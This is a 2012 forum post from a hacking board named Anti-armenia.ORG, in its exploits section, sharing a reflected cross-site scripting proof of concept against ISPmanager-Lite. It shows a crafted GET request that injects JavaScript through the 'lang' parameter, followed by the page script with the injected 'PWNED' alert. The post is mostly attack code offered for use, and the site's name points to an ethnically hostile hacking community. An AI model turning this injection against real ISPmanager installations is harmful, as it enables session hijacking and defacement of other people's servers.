Anti-armenia.ORG - Forumlar - ISPmanager-Lite

Forumlar / Hacking Platform / Exploits & Vulnerabilities / ISPmanager-Lite - XSS

Istifadəçi

2012-07-18 18:28 GMT

StealtH

Security

Mesaj Sayı : 839

Mövzu Sayı :

Rep Ver :

Rep Sayı : 25

Indi Saytda : Durum

Cinsiyyət : Oğlan

Şəhər : Sumqayıt

Ölkə :

Məslək : Pan - Turkism

Yaş : 34

Mesaj :

Kod:
GET /manager/ispmgr?lang=";alert("PWNED+BY+p1r0!");// HTTP/1.1
Cookie: PHPSESSID=nblmvs0lg0bfgvhu0uk4l1r2t5; ads=4815162342; ground=0; best=5; ispmgr4=aqua:ua:0
Host: site.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*

Kod:
<script language="JavaScript">
var imgpath = '/manimg/aqua/';
document.write( "<base href='"+location.protocol+"//"+location.host+imgpath+"'>" );
var binary = "/manager/ispmgr";

function setThemeLang () {
var theme = "aqua";
var lang = "";alert("PWNED BY StealtH");//";

for ( var i=0; i < document.authform.theme.options.length; i++ )
if ( document.authform.theme.options[i].value == theme ) {
document.authform.theme.selectedIndex = i;
break;
}

for ( var i=0; i < document.authform.lang.options.length; i++ )
if ( document.authform.lang.options[i].value == lang ) {
document.authform.lang.selectedIndex = i;
break;
}
}

function setQ() {
document.cookie = binary.substr(binary.lastIndexOf('/')+1)+"4="+ document.authform.theme.options[document.authform.theme.selectedIndex].value +":"+ document.authform.lang.options[document.authform.lang.selectedIndex].value +":0; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT";
return true;
}
</script>